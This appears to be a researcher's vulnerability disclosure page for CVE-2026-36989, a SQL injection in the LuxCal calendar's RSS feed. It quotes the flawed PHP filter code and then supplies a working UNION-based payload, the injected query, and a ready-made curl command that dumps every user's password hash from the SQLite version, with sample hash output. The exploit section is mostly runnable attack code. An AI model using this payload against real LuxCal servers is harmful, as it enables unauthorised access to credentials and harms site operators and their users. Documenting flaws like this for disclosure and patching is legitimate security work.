🏠 HOME

📰 BLOG

🔒 CVEs

✉️ CONTACT

📄 CV

CVE-2026-36989

# LuxCal Vulnerability (CVE-2026-36989) ## In rssfeed.php: ```php require './common/retrieve.php'; // (...) if (isset($_GET['cU'])) { $placeholders = preg_replace("~\d+~",'?',$_GET['cU']); $filter .= " AND e.`userID` IN ({$placeholders})"; $values .= ','.$_GET['cU']; } // (...) retrieve($fDate,$tDate,'',[$filter,substr($values,1)],'*'); ``` The filters are only replacing digits by "?", it's not preventing injections. ## In common/retrieve.php: ```php function retrieve($start,$end,$iFilter='',$xFilter='',$eType='0') { // (...) $query = "SELECT e.`ID` AS eid, e.`type` AS typ, // (...) WHERE e.`status` >= 0".($filter ? " AND ($filter".($eType === "*" ? " OR e.`type` > 0" : "").")" : "")." // (...) $stH = stPrep($query); stExec($stH,$valArr); // (...) } ``` The $filter variable is then injected in the query making it an injection point. ## Example payload to obtain passwords from the database: > :warning: this payload is for the **SQLite** version only, LuxCal5.3.4L available here: https://www.luxsoft.eu/dloader.php?file=luxcal534L.zip ```sql http://127.0.0.1:8000/rssfeed.php?cal=mycal&cU=) OR 0)) UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3000,0,0,0,0,0,0,0,0,0,(SELECT group_concat(password) FROM users),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 /* ``` ### The query will be initially: ```sql SELECT e.`ID` AS eid, e.`type` AS typ, -- (...) WHERE e.`status` >= 0 AND ((c.`ID` IN () OR ?)) UNION SELECT ?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,(SELECT group_concat(password) FROM users),?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,? /*)) OR e.`type` > 0) AND e.`sDate` <= '2026-03-18' AND (CASE WHEN e.`eDate` LIKE '9%' THEN e.`sDate` ELSE e.`eDate` END >= '2026-03-05' OR e.`rUntil` >= '2026-03-05') ORDER BY e.`sDate` ``` ### valArr will be initially: ```sql ) OR 0)) UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3000,0,0,0,0,0,0,0,0,0,(SELECT group_concat(password) FROM users),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 /* ``` ## At the end, the resulting query returns all the passwords in the Category field: ```sh curl 'http://127.0.0.1:8000/rssfeed.php?cal=mycal&cU=)%20OR%200))%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3000,0,0,0,0,0,0,0,0,0,(SELECT%20group_concat(password)%20FROM%20users),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20/*%0D%0A' -s|grep "Category" ``` ```rss
Category: ,21232f297a57a5a743894a0e4a801fc3]]> ``` ## Found by Mathys REBOUX